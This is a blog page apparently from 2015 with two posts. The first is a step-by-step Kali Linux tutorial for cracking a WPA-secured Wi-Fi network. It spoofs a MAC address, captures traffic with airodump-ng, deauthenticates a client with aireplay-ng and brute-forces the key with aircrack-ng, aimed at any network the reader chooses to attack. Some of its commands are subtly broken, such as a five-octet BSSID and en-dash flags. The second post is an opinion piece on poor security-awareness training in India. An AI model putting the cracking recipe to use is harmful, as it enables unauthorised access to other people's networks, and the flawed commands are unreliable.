Showing posts with label ethical hacking. Show all posts
Showing posts with label ethical hacking. Show all posts

Sunday, September 13, 2015

How to hack WI-FI using kali

How to do it...

Let's begin the process of using AirCrack to crack a network session secured by WPA.
1.       Open a terminal window and bring up a list of wireless network interfaces.
airmon-ng
2.       Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.
3.       Next, we need to stop the wlan0 interface and take it down.
airmon-ng stop wlan0 ifconfig wlan0 down
4.       Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55.
macchanger -–mac 00:11:22:33:44:55 wlan0
5.       Now  we need to restart airmon-ng. airmon-ng start wlan0
6.       Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0
7.       A listing of available networks will begin to appear. Once you fi nd the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will fi nd this information in the Channel column. In this case, the channel is 10.
8.       Now we run airodump and copy the information for the selected BSSID to a fi le.
We will utilize the following options:
q  –c allows us to select our channel. In this case, we use 10.
q  –w allows us to select the name of our file. In this case, we have chosen wirelessattack.
q  –bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard.
airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0
9.       A new terminal window will open displaying the output from the previous command. Leave this window open.
10.   Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng –dauth 1 –a [BSSID] –c [our chosen MAC address] [Interface]. This process may take a few moments.
Aireplay-ng --deauth 1 –a 09:AC:90:AB:78 –c 00:11:22:33:44:55 wlan0
11.   Finally, we run AirCrack to crack the WPA key. The –w option allows us to specify the location of our wordlist. We will use the .cap fi le that we named earlier. In this case, the fi le's name is wirelessattack.cap.
Aircrack-ng –w ./wordlist.lst wirelessattack.cap
That's it!







How it works...



In this recipe, we used the AirCrack suite to crack the WPA key of a wireless network. AirCrack is one of the most popular programs for cracking WPA. 
AirCrack works by gathering packets from a wireless connection over WPA and then brute-forcing passwords  against the gathered data until a successful handshake is established. 
We began the recipe by starting AirCrack and selecting our desired interface. 
Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. 
We concluded by gathering some traffi c and then brute forced the generated CAP file in order to get the wireless password.

Saturday, August 15, 2015

The fake security Awareness over India

Hello,

         This is Abhishek Mani Tiwari, here to introduced you to a biggest problem in Digital India program started by Indian Government and also the problem of todays IT industries in India.

         As we all know, India is growing in IT field day by day and it has acquired remarkable place in the world.IT industry has changed the image of India in the global arena. The new Era here growing is "Information security and Ethical Hacking". Today lots  of Institutes and Universities have stared a number of courses belonging to this revolution and are training IT security Experts Every day.

         The biggest problem or we can call it as a Bug in IT awareness programs is the contents they are providing in the there workshops or in practical session. Mostly the contents are outdated or they have already been patched. Also they do not provide the basic knowledge about the cause of existing problems and solutions to overcome them. After few Months of their course Participants get the certificate of "Ethical hacker" or "IT Security Expert" without being actually awared about current scenario.

         As a result of which when they face the actual existing problem in their job they are unable to tackle them due to lack of accurate knowledge.Since they had not been awared with "root of arising" of these problems.

         Making people, Developers or IT experts aware about  hacking or security in this way has brought us to a path which is leading our IT industries to vulnerabilility.

         This is a biggest problem needing our attention  to make our self and our county secure in real sense and  to move Digital India to the next step so that Indian Government's Project may become successful .We need to move our awareness program to right way to provide a genuine knowledge to our IT Industries.
          
          So,I would like to conclude with "If we really want to uproot any problem,we must know the root".
    
                                      Thank You :)